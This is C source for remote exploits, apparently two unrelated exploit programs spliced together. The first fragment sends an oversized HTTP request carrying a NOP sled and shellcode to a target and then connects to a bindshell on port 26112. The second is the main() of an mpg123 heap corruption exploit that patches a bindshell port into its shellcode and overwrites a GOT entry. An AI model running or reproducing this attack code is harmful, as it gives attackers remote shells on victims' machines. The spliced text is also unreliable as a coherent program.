retaddr=__pl_form[type].retaddr;
}
else (void)x_fp_rm_usage(argv[0]);
break;
case 'H':
case 'h':
memset((char *)hostname,0,sizeof(hostname));
strncpy(hostname,optarg,sizeof(hostname)-1);
break;
case 'u':
if(!user&&!(user=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'a':
if(!pass&&!(pass=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'c':
if(!writedir&&!(writedir=(char *)strdup(optarg)))
printe("main(): allocating memory failed.",1);
break;
case 'P':
case 'p':
port=atoi(optarg);
break;
case 'I':
case 'i':
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
exit(-1);
case '?':
(void)x_fp_rm_usage(argv[0]);
break;
}
}
if(!strcmp(hostname,D_HOST))
{
(void)x_fp_rm_usage(argv[0]);
}
else
{
fprintf(stdout," [+] Hostname: %s\n",hostname);
fprintf(stdout," [+] Port num: %d\n",port);
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
}
fprintf(stdout," [1] #1 Set codes.\n");
ftpsd=sock_connect(hostname,21);
ftp_parse(ftpsd);
memset(buf3,0x42,141);
memset(buf2,0x90,1000);
memcpy(buf2+1000,shell,strlen(shell));
memset(buf2+1000+strlen(shell),0x90,1000);
snprintf(sendbuf,3150,"GET /%s/%s/%s/%s/%s/%s/%s/ HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf3,buf3,buf3,buf3,buf3,buf3,buf3,buf2);
fprintf(stdout," [1] #1 Set socket.\n");
sd=sock_connect(hostname,port);
fprintf(stdout," [1] #1 Send codes.\n");
write(sd,sendbuf,3150);
close(sd);
sleep(10);
fprintf(stdout," [1] #3 Get shell.\n");
getshell(hostname,26112);
exit(0);
}
/* start of operations. */
int main(int argc,char **argv){
unsigned int i=0;
int chr=0;
char *hostptr, *nameptr="none";
printf("[*] mpg123[v0.59r,v0.59s]: remote client-side heap corruption"
" exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realh"
"alo)\n\n");
while((chr=getopt(argc,argv,"p:s:g:r:+:t:l"))!=EOF){
switch(chr){
case 'p':
port=atoi(optarg);
break;
case 's':
sport=atoi(optarg);
break;
case 'g':
sscanf(optarg,"%x",&gotaddr);
break;
case 'r':
sscanf(optarg,"%x",&requestaddr);
break;
case '+':
retoffset=(atoi(optarg)*4);
break;
case 't':
i=0;
while(target[i].p_name)i++;
if(atoi(optarg)>=i)
printf("[!] %u is not a valid target, ignored.\n",atoi(optarg));
else{
nameptr=target[atoi(optarg)].p_name;
gotaddr=target[atoi(optarg)].p_gotaddr;
requestaddr=target[atoi(optarg)].p_requestaddr;
retoffset=(target[atoi(optarg)].p_retoffset*4);
}
break;
case 'l':
platform_list();
break;
default:
usage(argv[0]);
break;
}
}
if(!port)usage(argv[0]);
/* verbose display. */
printf("[*] platform value base\t\t: %s.\n",nameptr);
printf("[*] fprintf GOT address\t\t: 0x%.8x.\n",gotaddr);
printf("[*] *request address location\t: 0x%.8x.\n",requestaddr);
printf("[*] *request offset(+?*4)\t: %u(=%u), ret=0x%.8x.\n\n",
(retoffset/4),retoffset,(requestaddr+retoffset));
/* set the bindshell port in the shellcode(byte 33/34). */
x86_exec[33]=(sport&0xff00)>>8;
x86_exec[34]=(sport&0x00ff);
/* audioserver_bind() returns the host that connected to it. */
hostptr=audioserver_bind();
/* check the host for success, see if the bindshell is listening. */
getshell(hostptr);
printf("[!] exploit failed.\n");
exit(0);
}
